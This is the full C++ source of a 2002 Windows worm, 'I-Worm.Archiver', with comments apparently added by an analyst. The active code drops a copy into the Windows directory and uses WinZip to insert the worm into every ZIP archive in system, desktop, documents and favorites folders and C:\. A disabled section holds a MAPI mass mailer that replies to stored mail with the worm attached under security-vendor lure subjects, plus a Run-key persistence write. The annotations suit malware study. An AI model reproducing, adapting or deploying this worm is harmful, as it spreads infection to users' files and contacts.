I-Worm.Archiver - Source Code

/*
Name : I-Worm.Archiver
Author : PetiK
Date : May 10th 2002 -
Language : C++

Comments : Infects ZIP files by invoking WinZip to add a copy of the worm to each archive.

        The same thing can be done with PowerArchiver:
            powerarc -a -c4 archive.zip virus.exe

*/
  13.  
  14. #include <windows.h>
  15. #include <stdio.h>
  16. #include <mapi.h>
  17.  
  18. #pragma argused
  19. #pragma inline
  20.  
  21.  
/* All state is file-scope; nothing here is thread-safe and none of the
 * fixed-size buffers below is written with a length check.
 *   filen   - full path of the running executable (GetModuleFileName)
 *   copyn   - drop location, "<windir>\Archiver.exe"
 *   copyreg - Run-key value "<copyn> -i" (the registry write is commented out)
 *   windir/sysdir - Windows and System directories
 *   inzip   - WinZip command line built by infzip()
 *   fsubj   - mail subject for the (compiled-out) mailer */
char    filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
/* Lure sender names and domains (AV vendors among them) used to build the
 * mail subject "News from <name><domain>" in the compiled-out mailer. */
char    *fnam[]={"news","support","info","newsletter","webmaster"};
char    *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
/* Registry paths: the HKLM Run key for persistence, and the .DEFAULT
 * profile's Shell Folders (read under HKEY_USERS, not HKEY_CURRENT_USER). */
LPSTR   run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
/* Attachment file name template; the eight 'x' characters are overwritten
 * in the mailer with characters derived from (unseeded) rand(). */
char    attname[]="news_xxxxxxxx.exe";
LPTSTR  cmdLine,ptr;            /* raw command line and the flag-scan cursor */
BOOL    installed;              /* TRUE when started with a "-i" argument */
/* Shell-folder paths and the winzip32.exe path read from the registry.
 * 50-byte buffers; globals start zero-filled, so a failed query is expected
 * to leave "" and the strlen(winzip) check in WinMain then skips infection. */
BYTE    desktop[50],favoris[50],personal[50],winzip[50];
DWORD   sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
    sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
DWORD   type=REG_SZ;            /* receives the value type from RegQueryValueEx; never checked */
long    i;

/* Simple-MAPI state for the mass-mail routine (compiled out in WinMain). */
LHANDLE session;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];   /* message id; copied originator name/address */
HINSTANCE hMAPI;

HKEY        hReg;
WIN32_FIND_DATA ffile;          /* shared by infzip()'s FindFirstFile/FindNextFile loop */

void infzip(char *);            /* adds the dropped copy to every *.zip in a folder */

/* Simple-MAPI entry points, resolved at run time with GetProcAddress on
 * MAPI32.DLL (see the commented-out section of WinMain) rather than linked. */
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
  53.  
/*
 * Entry point. Behaviour depends on how the process was started:
 *   no flag : first run -> drops a copy as "<windir>\Archiver.exe" and exits.
 *             The HKLM Run-key write is commented out and nothing here
 *             launches the dropped copy, so this build does not persist.
 *   -i      : "installed" run -> reads the shell folders and the WinZip
 *             path from the registry and calls infzip() on a fixed list
 *             of folders.
 *   -p      : shows an about box and a message box, then exits.
 * Every Win32 and registry call below ignores its return value.
 * Indicators visible in this code: a file named Archiver.exe in the
 * Windows directory, winzip32.exe spawned with "-a -r <zip> <that path>",
 * and ZIP archives that gain an Archiver.exe member.
 */
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{

/* Own path, System and Windows directories into 100-byte buffers with no
 * truncation check; copyn becomes "<windir>\Archiver.exe". */
GetModuleFileName(hInst,filen,100);
GetSystemDirectory((char *)sysdir,100);
GetWindowsDirectory((char *)copyn,100);
strcpy(windir,copyn);
strcat(copyn,"\\Archiver.exe");

/* Scan the raw command line for the first '-'. The loop also stops one
 * character before the terminating NUL, so a trailing lone '-' is ignored. */
installed=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
    for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
    if(ptr[0]=='-' && ptr[1]!=0) {
        switch(ptr[1]) {
            default:
            break;
            case 'i':
                installed=TRUE;   /* running as the dropped copy (see copyreg below) */
                break;
            case 'p':
                /* author credits; exits before any infection */
                ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
                MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
                    "I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
                ExitProcess(0);
                break;
            }
        }
    }

/* First run: drop a copy into the Windows directory. The Run-key value
 * "<copyn> -i" is built but the RegSetValueEx that would store it is
 * commented out, so the dropped copy is never auto-started from here. */
if(!installed) {
CopyFile(filen,copyn,FALSE);
strcpy(copyreg,copyn);
strcat(copyreg," -i");
/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg); */
ExitProcess(0);
}

/* Shell folders are read from HKEY_USERS\.DEFAULT (the default profile),
 * not HKEY_CURRENT_USER, so on a multi-user system these need not be the
 * interactive user's folders. Targets are 50-byte buffers; a failed open
 * or query is not detected and the queries run on whatever hReg holds. */
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegCloseKey(hReg);
/* Full path of winzip32.exe from its App Paths default value (NULL name). */
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
RegCloseKey(hReg);

/* No WinZip path -> no infection. Otherwise walk a fixed set of folders;
 * an empty shell-folder string is skipped inside infzip(). */
if(strlen(winzip)!=0) {
infzip(windir);
infzip(sysdir);
infzip(desktop);
infzip(personal);
infzip(favoris);
infzip("C:\\");
}

/* ---- Disabled code: the whole span below is a single comment ----
 * 1) Inline asm: LoadLibrary("WININET.DLL"), resolve
 *    InternetGetConnectedState and spin ("dec eax / jnz verf") until it
 *    reports a connection. "Tmp dd 0" emits data inside the code stream.
 * 2) Simple-MAPI mass mailer: resolves the MAPI32 exports, logs on, walks
 *    the message store with MAPIFindNext/MAPIReadMail(MAPI_ENVELOPE_ONLY
 *    |MAPI_PEEK) and sends each message back to its originator with the
 *    originator field rewritten to the message's original recipient, the
 *    subject "News from <name><domain>" from fnam/fmel (GetTickCount()%4
 *    and %5 never select the last entry of either table), a fixed
 *    security-themed lure body, and the running executable (filen)
 *    attached as news_<8 chars>.exe; rand() is never seeded. Only the
 *    last iteration's lpFiles and message buffer are released.
 * Why the author compiled this out is not visible in the source. */
/*
_asm
{
call    @wininet
db  "WININET.DLL",0
@wininet:
call    LoadLibrary
test    eax,eax
jz  end_asm
mov ebp,eax
call    @inetconnect
db  "InternetGetConnectedState",0
@inetconnect:
push    ebp
call    GetProcAddress
test    eax,eax
jz  end_wininet
mov edi,eax
verf:
push    0
push    Tmp
call    edi
dec eax
jnz verf

end_wininet:
push    ebp
call    FreeLibrary
end_asm:
jmp end_all_asm

Tmp dd 0

end_all_asm:
}


hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
  do {
     if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
    strcpy(mname,mes->lpOriginator->lpszName);
    strcpy(maddr,mes->lpOriginator->lpszAddress);

    for(i=0;i<8;i++)
    attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
    fsubj[0]=0;
    wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);


    mes->ulReserved=0;
    mes->lpszSubject=fsubj;
    mes->lpszNoteText="This is some news send by our firm about security.\n"
                "Please read by clicking on attached file.\n"
                "\tBest Regards";
    mes->lpszMessageType=NULL;
    mes->lpszDateReceived=NULL;
    mes->lpszConversationID=NULL;
    mes->flFlags=MAPI_SENT;
    mes->lpOriginator->ulReserved=0;
    mes->lpOriginator->ulRecipClass=MAPI_ORIG;
    mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
    mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
    mes->nRecipCount=1;
    mes->lpRecips->ulReserved=0;
    mes->lpRecips->ulRecipClass=MAPI_TO;
    mes->lpRecips->lpszName=mname;
    mes->lpRecips->lpszAddress=maddr;
    mes->nFileCount=1;
    mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
    memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
    mes->lpFiles->ulReserved=0;
    mes->lpFiles->flFlags=NULL;
    mes->lpFiles->nPosition=-1;
    mes->lpFiles->lpszPathName=filen;
    mes->lpFiles->lpszFileName=attname;
    mes->lpFiles->lpFileType=NULL;
    mSendMail(session, NULL, mes, NULL, NULL);
    }
  }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}

*/

ExitProcess(0);
}
  209.  
/*
 * Add the dropped worm copy (global copyn) to every *.zip file directly
 * inside `folder` by running WinZip from the command line:
 *     "<winzip32.exe path> -a -r <archive.zip> <copyn>"
 * (-a appears to be WinZip's "add" action and -r its recurse option; the
 * exact semantics are WinZip's, not visible here.)
 * Uses the globals winzip, copyn, inzip and ffile set up in WinMain.
 * An empty folder string is a no-op.
 * Observations for anyone analysing this sample:
 *  - SetCurrentDirectory's result is ignored; if it fails, the *.zip search
 *    silently runs in whatever directory was current before.
 *  - Neither path in the command line is quoted, so names containing
 *    spaces split into extra arguments.
 *  - inzip is 256 bytes and wsprintf is not length-limited, so a long
 *    WinZip path plus archive name can overrun it.
 *  - WinExec with nCmdShow 1 (SW_SHOWNORMAL) shows a WinZip window for each
 *    archive, and the find handle is never released with FindClose.
 */
void infzip(char *folder)
{
register bool abc=TRUE;     /* last FindNextFile result; FALSE ends the loop */
register HANDLE fh;         /* find handle for "*.zip" in the current directory */
if(strlen(folder)!=0) {
SetCurrentDirectory(folder);
fh=FindFirstFile("*.zip",&ffile);
if(fh!=INVALID_HANDLE_VALUE) {
    while(abc) {
    inzip[0]=0;
    wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
    WinExec(inzip,1);       /* one WinZip process per archive; result ignored */
    abc=FindNextFile(fh,&ffile);
    }
}
}

}